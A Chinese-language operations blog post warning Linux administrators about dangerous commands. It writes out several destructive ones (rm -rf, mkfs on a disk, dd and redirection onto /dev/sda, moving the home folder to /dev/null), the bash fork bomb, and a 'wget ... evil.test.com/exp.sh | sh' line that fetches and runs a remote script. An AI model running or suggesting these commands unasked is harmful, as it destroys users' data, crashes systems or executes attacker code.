Linux需要谨慎使用的几个命令

运维安全 2017-10-25

运维人员经常接触的 Linux 系统比较多,在 Linux 下的管理与操作通常都是通过命令行的方式对服务器进行操作,为了操作安全,有些命令的危害是特别大的,需要谨慎使用,下面就简单列了几个比较常见的命令。

rm -rf

rm 命令大家都不陌生,rf 参数也都知道是什么意思,意思是强制删除指定目录下的所有文件和文件夹,经常有同学在使用这个命令的时候出现误操作,指定的目录写成根目录导致悲剧的发生,我有一次在使用这个命令的时候,本来以为自己已经切换到我要删除的目录,然后使用了 rm -rf . ,然而并没有切换,直接将网站全部删除,这是我真的是欲哭无泪,血的教训啊。

mkfs.ext4 /dev/sda1

这个命令的作用是将 /dev/sda1 格式化,这个操作造成的危害大家可能都经历过在安装 windows 操作系统的时候,一不小心把硬盘格式化的事情,想想都可怕。

:(){:|:&};:

以上命令是 Linux 下的 bash fork 炸弹,我们将上面的命令换一下形式如下:

: () {
​ : | : &
}; :

以上命令中: 是函数名,执行一个调用自己的递归并且回调自己,& 表示后台执行程序,最后的一个 : 是在函数外调用和执行 : () 这个函数的意思。最终的目的就是创建一个每次调用自身调用两次的函数,并没有任何方法来终止自身。 然后它将保持倍增,直到您用完系统资源为止。

mv ~ /dev/null

/dev/null ,从名称上可以很显然看出是一个空文件(写入到 /dev/null 时全部丢失,读取 /dev/null 时自己返回 EOF )。这条命令的意思就是将用户文件移动到 /dev/null ,也就是变相的删除文件,所以使用这个命令的时候也要小心,防止丢失数据。

^foo^bar

^foo^bar 命令用于编辑以前运行的命令,而不需要重新输入整个命令。在不确定之前命令的作用之前,小心使用这个命令,防止出现不必要的麻烦。

dd if=/dev/random of=/dev/sda

Dd命令用于复制 & 改变硬盘分区。如果,你用错地方了,那么也很危险。比如下面的命令可以使整个主硬盘清零:dd if=/dev/zero of=/dev/had

> file

这个命令的作用是将之前的内容重定向到文件中,而且是覆盖掉原有文件,所以在执行这个操作的时候要小心后面的文件,确保文件名正确,否则会因为自己的失误把重要的文件覆盖掉,造成不必要的麻烦。

> /dev/sda

这个命令的关键在于后面的 /dev/sda ,执行完这个操作之后,数据会被写入第一个硬盘,导致覆盖掉所有文件和文件夹。危害可想而知。

wget http://evil.test.com/exp.sh -O- | sh

这个命令经常被黑客拿来使用,在受害机器上下载并执行黑客指定的脚本,执行反弹 shell 或者提权啥的操作。作为运维者,小心使用这个命令,防止黑客使用钓鱼等技术诱使你执行他让你执行的命令,导致系统沦陷。


本文由 myh0st 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。

楼主残忍的关闭了评论